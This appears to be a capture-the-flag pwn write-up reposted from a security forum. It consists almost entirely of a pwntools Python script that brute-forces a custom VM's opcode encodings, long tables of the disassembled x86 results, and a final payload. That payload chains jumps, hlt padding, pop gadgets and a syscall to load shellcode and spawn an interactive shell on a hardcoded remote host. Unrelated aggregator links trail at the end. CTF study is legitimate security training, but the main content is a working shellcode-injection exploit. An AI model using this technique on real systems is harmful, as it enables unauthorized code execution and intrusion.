# hack gsp(4, 2, 3, 3, 0x1111)    0:   66 c1 ea 0f             shr    dx, 0xf

# hack gsp(4, 4, 0, 0, 0x1111)    0:   66 85 c0                test   ax, ax
# hack gsp(4, 4, 0, 1, 0x1111)    0:   66 85 db                test   bx, bx
# hack gsp(4, 4, 0, 2, 0x1111)    0:   66 85 c9                test   cx, cx
# hack gsp(4, 4, 0, 3, 0x1111)    0:   66 85 d2                test   dx, dx
# hack gsp(4, 4, 1, 0, 0x1111)    0:   66 85 c0                test   ax, ax
# hack gsp(4, 4, 1, 1, 0x1111)    0:   66 85 db                test   bx, bx
# hack gsp(4, 4, 1, 2, 0x1111)    0:   66 85 c9                test   cx, cx
# hack gsp(4, 4, 1, 3, 0x1111)    0:   66 85 d2                test   dx, dx
# hack gsp(4, 4, 2, 0, 0x1111)    0:   66 85 c0                test   ax, ax
# hack gsp(4, 4, 2, 1, 0x1111)    0:   66 85 db                test   bx, bx
# hack gsp(4, 4, 2, 2, 0x1111)    0:   66 85 c9                test   cx, cx
# hack gsp(4, 4, 2, 3, 0x1111)    0:   66 85 d2                test   dx, dx
# hack gsp(4, 4, 3, 0, 0x1111)    0:   66 85 c0                test   ax, ax
# hack gsp(4, 4, 3, 1, 0x1111)    0:   66 85 db                test   bx, bx
# hack gsp(4, 4, 3, 2, 0x1111)    0:   66 85 c9                test   cx, cx
# hack gsp(4, 4, 3, 3, 0x1111)    0:   66 85 d2                test   dx, dx

# hack gsp(4, 0, 0, 0, 0x1111)    0:   66 f7 d0                not    ax
# hack gsp(4, 0, 0, 1, 0x1111)    0:   66 f7 d3                not    bx
# hack gsp(4, 0, 0, 2, 0x1111)    0:   66 f7 d1                not    cx
# hack gsp(4, 0, 0, 3, 0x1111)    0:   66 f7 d2                not    dx
# hack gsp(4, 0, 1, 0, 0x1111)    0:   66 f7 d0                not    ax
# hack gsp(4, 0, 1, 1, 0x1111)    0:   66 f7 d3                not    bx
# hack gsp(4, 0, 1, 2, 0x1111)    0:   66 f7 d1                not    cx
# hack gsp(4, 0, 1, 3, 0x1111)    0:   66 f7 d2                not    dx
# hack gsp(4, 0, 2, 0, 0x1111)    0:   66 f7 d0                not    ax
# hack gsp(4, 0, 2, 1, 0x1111)    0:   66 f7 d3                not    bx
# hack gsp(4, 0, 2, 2, 0x1111)    0:   66 f7 d1                not    cx
# hack gsp(4, 0, 2, 3, 0x1111)    0:   66 f7 d2                not    dx
# hack gsp(4, 0, 3, 0, 0x1111)    0:   66 f7 d0                not    ax
# hack gsp(4, 0, 3, 1, 0x1111)    0:   66 f7 d3                not    bx
# hack gsp(4, 0, 3, 2, 0x1111)    0:   66 f7 d1                not    cx
# hack gsp(4, 0, 3, 3, 0x1111)    0:   66 f7 d2                not    dx

### ....
### ....


def gsp(opcode, cmd1=0, o1=0, o2=0, data=0xbeef):
    op = 0
    # 0xF
    op += cmd1 + (opcode<<4)
    print(op)
    op += (o2 + (o1<<4) << 8)
    print(op)
    op += (data) << 0x10
    print(op)
    return p32(op)
# 0x123406050807

for o1 in range(0x10):
    for o2 in range(0x10):
        io = start([])
        #gdb.attach(io,gdbscript='brva 0x002024')
        ru('code:\n')

        opcode = 4
        cmd1 = 4

        pay = gsp(opcode, cmd1, o1, o2, 0x1111)
        s(pay)
        #itr()
        try:
            ru(b'Sorry, I forget to set the memory region writable...\n')
            r(0x2a)
            data = ru(p64(0))[:-9]
            if (data):
                print(f'gsp({opcode}, {cmd1}, {o1}, {o2}, 0x1111)','# hack',disasm(data))
            io.close()
        except:
            pass

    #itr()

exploit

# imLZH1
from pwn import *
#from ctypes import CDLL
#cdl = CDLL('/lib/x86_64-linux-gnu/libc.so.6')
s    = lambda   x : io.send(x)
sa   = lambda x,y : io.sendafter(x,y)
sl   = lambda   x : io.sendline(x)
sla  = lambda x,y : io.sendlineafter(x,y)
r    = lambda x   : io.recv(x)
ru   = lambda x   : io.recvuntil(x)
rl   = lambda     : io.recvline()
itr  = lambda     : io.interactive()
uu32 = lambda x   : u32(x.ljust(4,b'\x00'))
uu64 = lambda x   : u64(x.ljust(8,b'\x00'))
ls   = lambda x   : log.success(x)
lss  = lambda x   : ls('\033[1;31;40m%s -> 0x%x \033[0m' % (x, eval(x)))

attack = '1.95.131.201:10001'
binary = './patch/chall'

def start(argv=[], *a, **kw):
    if args.GDB:return gdb.debug(binary,gdbscript)
    if args.TAG:return remote(*args.TAG.split(':'))
    if args.REM:return remote(*attack.split(':'))
    return process([binary] + argv, *a, **kw)

#context(binary = binary, log_level = 'info',
context(binary = binary, log_level = 'debug',
terminal='tmux splitw -h -l 170'.split(' '))

libc = context.binary.libc
#elf  = ELF(binary)
#print(context.binary.libs)
#libc = ELF('./libc.so.6')

#import socks
#context.proxy = (socks.SOCKS5, '192.168.31.251', 10808)

gdbscript = '''
#brva 0x02349
brva 0x01ECF
brva 0x0274D
brva 0x02479
#continue
'''.format(**locals())

#io = rmote()
#pay = flat({
#},filler=b'\x00')
#gdb.attach(io,gdbscript)

### 0
# hack gsp(0, 1, 0, 0, 0x1111)    0:   66 b8 11 11             mov    ax, 0x1111
# hack gsp(0, 1, 1, 0, 0x1111)    0:   66 bb 11 11             mov    bx, 0x1111
# hack gsp(0, 1, 2, 0, 0x1111)    0:   66 b9 11 11             mov    cx, 0x1111
# hack gsp(0, 1, 3, 0, 0x1111)    0:   66 ba 11 11             mov    dx, 0x1111

# hack gsp(0, 0, 0, 0, 0x1111)    0:   66 89 c0                mov    ax, ax
# hack gsp(0, 0, 0, 1, 0x1111)    0:   66 89 d8                mov    ax, bx
# hack gsp(0, 0, 0, 2, 0x1111)    0:   66 89 c8                mov    ax, cx
# hack gsp(0, 0, 0, 3, 0x1111)    0:   66 89 d0                mov    ax, dx
# hack gsp(0, 0, 1, 0, 0x1111)    0:   66 89 c3                mov    bx, ax
# hack gsp(0, 0, 1, 1, 0x1111)    0:   66 89 db                mov    bx, bx
# hack gsp(0, 0, 1, 2, 0x1111)    0:   66 89 cb                mov    bx, cx
# hack gsp(0, 0, 1, 3, 0x1111)    0:   66 89 d3                mov    bx, dx
# hack gsp(0, 0, 2, 0, 0x1111)    0:   66 89 c1                mov    cx, ax
# hack gsp(0, 0, 2, 1, 0x1111)    0:   66 89 d9                mov    cx, bx
# hack gsp(0, 0, 2, 2, 0x1111)    0:   66 89 c9                mov    cx, cx
# hack gsp(0, 0, 2, 3, 0x1111)    0:   66 89 d1                mov    cx, dx
# hack gsp(0, 0, 3, 0, 0x1111)    0:   66 89 c2                mov    dx, ax
# hack gsp(0, 0, 3, 1, 0x1111)    0:   66 89 da                mov    dx, bx
# hack gsp(0, 0, 3, 2, 0x1111)    0:   66 89 ca                mov    dx, cx
# hack gsp(0, 0, 3, 3, 0x1111)    0:   66 89 d2                mov    dx, dx


### 1
# hack gsp(1, 1, 0, 0, 0x1111)    0:   66 11 c0                adc    ax, ax
# hack gsp(1, 1, 0, 1, 0x1111)    0:   66 11 d8                adc    ax, bx
# hack gsp(1, 1, 0, 2, 0x1111)    0:   66 11 c8                adc    ax, cx
# hack gsp(1, 1, 0, 3, 0x1111)    0:   66 11 d0                adc    ax, dx
# hack gsp(1, 1, 1, 0, 0x1111)    0:   66 11 c3                adc    bx, ax
# hack gsp(1, 1, 1, 1, 0x1111)    0:   66 11 db                adc    bx, bx
# hack gsp(1, 1, 1, 2, 0x1111)    0:   66 11 cb                adc    bx, cx
# hack gsp(1, 1, 1, 3, 0x1111)    0:   66 11 d3                adc    bx, dx
# hack gsp(1, 1, 2, 0, 0x1111)    0:   66 11 c1                adc    cx, ax
# hack gsp(1, 1, 2, 1, 0x1111)    0:   66 11 d9                adc    cx, bx
# hack gsp(1, 1, 2, 2, 0x1111)    0:   66 11 c9                adc    cx, cx
# hack gsp(1, 1, 2, 3, 0x1111)    0:   66 11 d1                adc    cx, dx
# hack gsp(1, 1, 3, 0, 0x1111)    0:   66 11 c2                adc    dx, ax
# hack gsp(1, 1, 3, 1, 0x1111)    0:   66 11 da                adc    dx, bx
# hack gsp(1, 1, 3, 2, 0x1111)    0:   66 11 ca                adc    dx, cx
# hack gsp(1, 1, 3, 3, 0x1111)    0:   66 11 d2                adc    dx, dx

# hack gsp(1, 0, 0, 0, 0x1111)    0:   66 01 c0                add    ax, ax
# hack gsp(1, 0, 0, 1, 0x1111)    0:   66 01 d8                add    ax, bx
# hack gsp(1, 0, 0, 2, 0x1111)    0:   66 01 c8                add    ax, cx
# hack gsp(1, 0, 0, 3, 0x1111)    0:   66 01 d0                add    ax, dx
# hack gsp(1, 0, 1, 0, 0x1111)    0:   66 01 c3                add    bx, ax
# hack gsp(1, 0, 1, 1, 0x1111)    0:   66 01 db                add    bx, bx
# hack gsp(1, 0, 1, 2, 0x1111)    0:   66 01 cb                add    bx, cx
# hack gsp(1, 0, 1, 3, 0x1111)    0:   66 01 d3                add    bx, dx
# hack gsp(1, 0, 2, 0, 0x1111)    0:   66 01 c1                add    cx, ax
# hack gsp(1, 0, 2, 1, 0x1111)    0:   66 01 d9                add    cx, bx
# hack gsp(1, 0, 2, 2, 0x1111)    0:   66 01 c9                add    cx, cx
# hack gsp(1, 0, 2, 3, 0x1111)    0:   66 01 d1                add    cx, dx
# hack gsp(1, 0, 3, 0, 0x1111)    0:   66 01 c2                add    dx, ax
# hack gsp(1, 0, 3, 1, 0x1111)    0:   66 01 da                add    dx, bx
# hack gsp(1, 0, 3, 2, 0x1111)    0:   66 01 ca                add    dx, cx
# hack gsp(1, 0, 3, 3, 0x1111)    0:   66 01 d2                add    dx, dx

### 2
# hack gsp(2, 0, 0, 0, 0x1111)    0:   66 29 c0                sub    ax, ax
# hack gsp(2, 0, 0, 1, 0x1111)    0:   66 29 d8                sub    ax, bx
# hack gsp(2, 0, 0, 2, 0x1111)    0:   66 29 c8                sub    ax, cx
# hack gsp(2, 0, 0, 3, 0x1111)    0:   66 29 d0                sub    ax, dx
# hack gsp(2, 0, 1, 0, 0x1111)    0:   66 29 c3                sub    bx, ax
# hack gsp(2, 0, 1, 1, 0x1111)    0:   66 29 db                sub    bx, bx
# hack gsp(2, 0, 1, 2, 0x1111)    0:   66 29 cb                sub    bx, cx
# hack gsp(2, 0, 1, 3, 0x1111)    0:   66 29 d3                sub    bx, dx
# hack gsp(2, 0, 2, 0, 0x1111)    0:   66 29 c1                sub    cx, ax
# hack gsp(2, 0, 2, 1, 0x1111)    0:   66 29 d9                sub    cx, bx
# hack gsp(2, 0, 2, 2, 0x1111)    0:   66 29 c9                sub    cx, cx
# hack gsp(2, 0, 2, 3, 0x1111)    0:   66 29 d1                sub    cx, dx
# hack gsp(2, 0, 3, 0, 0x1111)    0:   66 29 c2                sub    dx, ax
# hack gsp(2, 0, 3, 1, 0x1111)    0:   66 29 da                sub    dx, bx
# hack gsp(2, 0, 3, 2, 0x1111)    0:   66 29 ca                sub    dx, cx
# hack gsp(2, 0, 3, 3, 0x1111)    0:   66 29 d2                sub    dx, dx

# hack gsp(2, 1, 0, 0, 0x1111)    0:   66 19 c0                sbb    ax, ax
# hack gsp(2, 1, 0, 1, 0x1111)    0:   66 19 d8                sbb    ax, bx
# hack gsp(2, 1, 0, 2, 0x1111)    0:   66 19 c8                sbb    ax, cx
# hack gsp(2, 1, 0, 3, 0x1111)    0:   66 19 d0                sbb    ax, dx
# hack gsp(2, 1, 1, 0, 0x1111)    0:   66 19 c3                sbb    bx, ax
# hack gsp(2, 1, 1, 1, 0x1111)    0:   66 19 db                sbb    bx, bx
# hack gsp(2, 1, 1, 2, 0x1111)    0:   66 19 cb                sbb    bx, cx
# hack gsp(2, 1, 1, 3, 0x1111)    0:   66 19 d3                sbb    bx, dx
# hack gsp(2, 1, 2, 0, 0x1111)    0:   66 19 c1                sbb    cx, ax
# hack gsp(2, 1, 2, 1, 0x1111)    0:   66 19 d9                sbb    cx, bx
# hack gsp(2, 1, 2, 2, 0x1111)    0:   66 19 c9                sbb    cx, cx
# hack gsp(2, 1, 2, 3, 0x1111)    0:   66 19 d1                sbb    cx, dx
# hack gsp(2, 1, 3, 0, 0x1111)    0:   66 19 c2                sbb    dx, ax
# hack gsp(2, 1, 3, 1, 0x1111)    0:   66 19 da                sbb    dx, bx
# hack gsp(2, 1, 3, 2, 0x1111)    0:   66 19 ca                sbb    dx, cx
# hack gsp(2, 1, 3, 3, 0x1111)    0:   66 19 d2                sbb    dx, dx


### 4
# hack gsp(4, 1, 0, 0, 0x1111)    0:   66 f7 d8                neg    ax
# hack gsp(4, 1, 0, 1, 0x1111)    0:   66 f7 db                neg    bx
# hack gsp(4, 1, 0, 2, 0x1111)    0:   66 f7 d9                neg    cx
# hack gsp(4, 1, 0, 3, 0x1111)    0:   66 f7 da                neg    dx
# hack gsp(4, 1, 1, 0, 0x1111)    0:   66 f7 d8                neg    ax
# hack gsp(4, 1, 1, 1, 0x1111)    0:   66 f7 db                neg    bx
# hack gsp(4, 1, 1, 2, 0x1111)    0:   66 f7 d9                neg    cx
# hack gsp(4, 1, 1, 3, 0x1111)    0:   66 f7 da                neg    dx
# hack gsp(4, 1, 2, 0, 0x1111)    0:   66 f7 d8                neg    ax
# hack gsp(4, 1, 2, 1, 0x1111)    0:   66 f7 db                neg    bx
# hack gsp(4, 1, 2, 2, 0x1111)    0:   66 f7 d9                neg    cx
# hack gsp(4, 1, 2, 3, 0x1111)    0:   66 f7 da                neg    dx
# hack gsp(4, 1, 3, 0, 0x1111)    0:   66 f7 d8                neg    ax
# hack gsp(4, 1, 3, 1, 0x1111)    0:   66 f7 db                neg    bx
# hack gsp(4, 1, 3, 2, 0x1111)    0:   66 f7 d9                neg    cx
# hack gsp(4, 1, 3, 3, 0x1111)    0:   66 f7 da                neg    dx

# hack gsp(4, 2, 0, 0, 0x1111)    0:   66 c1 e8 0f             shr    ax, 0xf
# hack gsp(4, 2, 0, 1, 0x1111)    0:   66 c1 eb 0f             shr    bx, 0xf
# hack gsp(4, 2, 0, 2, 0x1111)    0:   66 c1 e9 0f             shr    cx, 0xf
# hack gsp(4, 2, 0, 3, 0x1111)    0:   66 c1 ea 0f             shr    dx, 0xf
# hack gsp(4, 2, 1, 0, 0x1111)    0:   66 c1 e8 0f             shr    ax, 0xf
# hack gsp(4, 2, 1, 1, 0x1111)    0:   66 c1 eb 0f             shr    bx, 0xf
# hack gsp(4, 2, 1, 2, 0x1111)    0:   66 c1 e9 0f             shr    cx, 0xf
# hack gsp(4, 2, 1, 3, 0x1111)    0:   66 c1 ea 0f             shr    dx, 0xf
# hack gsp(4, 2, 2, 0, 0x1111)    0:   66 c1 e8 0f             shr    ax, 0xf
# hack gsp(4, 2, 2, 1, 0x1111)    0:   66 c1 eb 0f             shr    bx, 0xf
# hack gsp(4, 2, 2, 2, 0x1111)    0:   66 c1 e9 0f             shr    cx, 0xf
# hack gsp(4, 2, 2, 3, 0x1111)    0:   66 c1 ea 0f             shr    dx, 0xf
# hack gsp(4, 2, 3, 0, 0x1111)    0:   66 c1 e8 0f             shr    ax, 0xf
# hack gsp(4, 2, 3, 1, 0x1111)    0:   66 c1 eb 0f             shr    bx, 0xf
# hack gsp(4, 2, 3, 2, 0x1111)    0:   66 c1 e9 0f             shr    cx, 0xf
# hack gsp(4, 2, 3, 3, 0x1111)    0:   66 c1 ea 0f             shr    dx, 0xf

# hack gsp(4, 4, 0, 0, 0x1111)    0:   66 85 c0                test   ax, ax
# hack gsp(4, 4, 0, 1, 0x1111)    0:   66 85 db                test   bx, bx
# hack gsp(4, 4, 0, 2, 0x1111)    0:   66 85 c9                test   cx, cx
# hack gsp(4, 4, 0, 3, 0x1111)    0:   66 85 d2                test   dx, dx
# hack gsp(4, 4, 1, 0, 0x1111)    0:   66 85 c0                test   ax, ax
# hack gsp(4, 4, 1, 1, 0x1111)    0:   66 85 db                test   bx, bx
# hack gsp(4, 4, 1, 2, 0x1111)    0:   66 85 c9                test   cx, cx
# hack gsp(4, 4, 1, 3, 0x1111)    0:   66 85 d2                test   dx, dx
# hack gsp(4, 4, 2, 0, 0x1111)    0:   66 85 c0                test   ax, ax
# hack gsp(4, 4, 2, 1, 0x1111)    0:   66 85 db                test   bx, bx
# hack gsp(4, 4, 2, 2, 0x1111)    0:   66 85 c9                test   cx, cx
# hack gsp(4, 4, 2, 3, 0x1111)    0:   66 85 d2                test   dx, dx
# hack gsp(4, 4, 3, 0, 0x1111)    0:   66 85 c0                test   ax, ax
# hack gsp(4, 4, 3, 1, 0x1111)    0:   66 85 db                test   bx, bx
# hack gsp(4, 4, 3, 2, 0x1111)    0:   66 85 c9                test   cx, cx
# hack gsp(4, 4, 3, 3, 0x1111)    0:   66 85 d2                test   dx, dx

# hack gsp(4, 0, 0, 0, 0x1111)    0:   66 f7 d0                not    ax
# hack gsp(4, 0, 0, 1, 0x1111)    0:   66 f7 d3                not    bx
# hack gsp(4, 0, 0, 2, 0x1111)    0:   66 f7 d1                not    cx
# hack gsp(4, 0, 0, 3, 0x1111)    0:   66 f7 d2                not    dx
# hack gsp(4, 0, 1, 0, 0x1111)    0:   66 f7 d0                not    ax
# hack gsp(4, 0, 1, 1, 0x1111)    0:   66 f7 d3                not    bx
# hack gsp(4, 0, 1, 2, 0x1111)    0:   66 f7 d1                not    cx
# hack gsp(4, 0, 1, 3, 0x1111)    0:   66 f7 d2                not    dx
# hack gsp(4, 0, 2, 0, 0x1111)    0:   66 f7 d0                not    ax
# hack gsp(4, 0, 2, 1, 0x1111)    0:   66 f7 d3                not    bx
# hack gsp(4, 0, 2, 2, 0x1111)    0:   66 f7 d1                not    cx
# hack gsp(4, 0, 2, 3, 0x1111)    0:   66 f7 d2                not    dx
# hack gsp(4, 0, 3, 0, 0x1111)    0:   66 f7 d0                not    ax
# hack gsp(4, 0, 3, 1, 0x1111)    0:   66 f7 d3                not    bx
# hack gsp(4, 0, 3, 2, 0x1111)    0:   66 f7 d1                not    cx
# hack gsp(4, 0, 3, 3, 0x1111)    0:   66 f7 d2                not    dx



io = start([])

def gsp(opcode, cmd1=0, o1=0, o2=0, data=0xbeef):
    op = 0
    # 0xF
    op += cmd1 + (opcode<<4)
    print(op)
    op += (o2 + (o1<<4) << 8)
    print(op)
    op += (data) << 0x10
    print(op)
    return p32(op)

#gdb.attach(io,gdbscript=gdbscript+'brva 0x01CD5')

ru('code:\n')
#pay = gsp(opcode, cmd1, o1, o2, 0x2)
pay = b''
#pay += gsp(0, 1, 0, 0, 0x1111)#   0:   66 b8 11 11             mov    ax, 0x1111
#pay += gsp(0, 1, 0, 0, 0x1111)#    0:   66 b8 11 11             mov    ax, 0x1111
#pay += gsp(4, 0, 0, 0, 0x1111)
#pay += gsp(6, 1, 12, 4, 0x1111)
#pay += gsp(5, 0, 0, 0, 0x3)#    0:   66 b8 11 11             mov    ax, 0x1111i


pay += gsp(4, 4, 7, 4, 0x1111)#     0:   eb 11                   jmp    0x13
pay += gsp(9, 0, 0, 0, 0xFFFF) *0xF # hlt pad
pay += gsp(0, 1, 0, 0, u16(asm('pop rax;pop rdi')))#    0:   66 b8 11 11             mov    ax, 

pay += gsp(0, 1, 1, 0, 0x15db)#    0:   66 bb 11 11             mov    bx, 0x1111
pay += gsp(2, 0, 0, 1, 0)#    0:   66 29 d8                sub    ax, bx

pay += gsp(0, 1, 3, 0, 0x7)#    0:   66 ba 11 11             mov    dx, 0x1111


pay += gsp(4, 4, 7, 4, 0x1111)#    0:   eb 11                   jmp    0x13
pay += gsp(9, 0, 0, 0, 0xFFFF) *0xF# hlt
pay += gsp(0, 1, 0, 0, u16(asm('pop rdi;pop rdi')))#    0:   66 b8 11 11             mov    ax, 0x1111

pay += gsp(4, 4, 7, 4, 0x1111)#    0:   eb 11                   jmp    0x13
pay += gsp(9, 0, 0, 0, 0xFFFF) *0xF# hlt
pay += gsp(0, 1, 0, 0, u16(asm('pop rdi;pop rdi')))#    0:   66 b8 11 11             mov    ax, 0x1111

pay += gsp(4, 4, 7, 4, 0x1111)#    0:   eb 11                   jmp    0x13
pay += gsp(9, 0, 0, 0, 0xFFFF) *0xF# hlt
pay += gsp(0, 1, 0, 0, u16('f\xbe'))#    0:   66 b8 11 11             mov    ax, 0x1111
pay += gsp(0, 1, 0, 0, 0x9090)#    0:   66 b8 11 11             mov    ax, 0x1111

pay += gsp(4, 4, 7, 4, 0x1111)#    0:   eb 11                   jmp    0x13
pay += gsp(9, 0, 0, 0, 0xFFFF) *0xF# hlt
pay += gsp(0, 1, 0, 0, u16(asm('call rax')))#    0:   66 b8 11 11             mov    ax, 0x1111

pay += gsp(4, 4, 7, 4, 0x1111)#    0:   eb 11                   jmp    0x13
pay += gsp(9, 0, 0, 0, 0xFFFF) *0xF# hlt
pay += gsp(0, 1, 0, 0, u16(asm('push 0')))#    0:   66 b8 11 11             mov    ax, 0x1111

pay += gsp(4, 4, 7, 4, 0x1111)#    0:   eb 11                   jmp    0x13
pay += gsp(9, 0, 0, 0, 0xFFFF) *0xF# hlt
pay += gsp(0, 1, 0, 0, u16(asm('push 0')))#    0:   66 b8 11 11             mov    ax, 0x1111

pay += gsp(4, 4, 7, 4, 0x1111)#    0:   eb 11                   jmp    0x13
pay += gsp(9, 0, 0, 0, 0xFFFF) *0xF# hlt
pay += gsp(0, 1, 0, 0, u16(asm('pop rax;push rdi')))#    0:   66 b8 11 11             mov    ax, 0x1111

pay += gsp(4, 4, 7, 4, 0x1111)#    0:   eb 11                   jmp    0x13
pay += gsp(9, 0, 0, 0, 0xFFFF) *0xF# hlt
pay += gsp(0, 1, 0, 0, u16(asm('pop rsi;pop rdi')))#    0:   66 b8 11 11             mov    ax, 0x1111

pay += gsp(0, 1, 3, 0, 0x500)#    0:   66 ba 11 11             mov    dx, 0x1111

pay += gsp(4, 4, 7, 4, 0x1111)#    0:   eb 11                   jmp    0x13
pay += gsp(9, 0, 0, 0, 0xFFFF) *0xF# hlt
pay += gsp(0, 1, 0, 0, u16(asm('syscall')))#    0:   66 b8 11 11             mov    ax, 0x1111

pay += gsp(0, 1, 0, 0, 0x9090)#    0:   66 b8 11 11             mov    ax, 0x1111
pay += gsp(0, 1, 0, 0, 0x9090)#    0:   66 b8 11 11             mov    ax, 0x1111
pay += gsp(0, 1, 0, 0, 0x9090)#    0:   66 b8 11 11             mov    ax, 0x1111
pay += gsp(0, 1, 0, 0, 0x9090)#    0:   66 b8 11 11             mov    ax, 0x1111
s(pay)
pause()
pay = b'\x90' * 0x200
pay += asm(shellcraft.sh())
sl(pay)
itr()


5

SU_msg_cfgd


先分析菜单


被C++ 击败了





看雪ID:imLZH1

https://bbs.kanxue.com/user-home-987517.htm

*本文为看雪论坛优秀文章,由 imLZH1 原创,转载请注明来自看雪社区





球分享

球点赞

球在看


点击阅读原文查看更多

推荐文章
法治进行时  ·  大兴区消防救援支队助力2025年春运开展消防宣传活动
昨天
法治进行时  ·  大兴区消防救援支队助力2025年春运开展消防宣传活动
昨天
信安之路  ·  即使变卖个人资产,也要给大家把工资补上!
昨天
TOP电商  ·  网红小狗命丧直播间,又一顶流网红遭全网审判
2 天前
TOP电商  ·  网红小狗命丧直播间,又一顶流网红遭全网审判
2 天前
财汇数据  ·  大咖云集,邀您参与企业预警通直播!
2 天前
财汇数据  ·  大咖云集,邀您参与企业预警通直播!
2 天前
企名片  ·  元禾璞华,宣布募资数十亿;影眸科技完成数千万美元 A 轮融资丨企名片Weekly
3 天前
企名片  ·  元禾璞华,宣布募资数十亿;影眸科技完成数千万美元 A 轮融资丨企名片Weekly
3 天前
宇宙解码  ·  这是真的吗?恒星的一生都在奉献
7 年前
极客大本营  ·  全新荣耀9,顶尖配置,堪称手机中颜值的担当 丨免费试用
7 年前
电商零售头条  ·  还没买车的恭喜了!全国首家汽车超市开业,买车就像买菜一样方便!
7 年前
生物探索  ·  FASEB:绿茶或可改善肥胖、记忆障碍,预防痴呆
7 年前
中国生物技术网  ·  2017年度第十届“谈家桢生命科学奖”候选名单公示
7 年前
Sov5搜索   ·   小百科   ·   移动版
51好读 - 好文章就要读起来!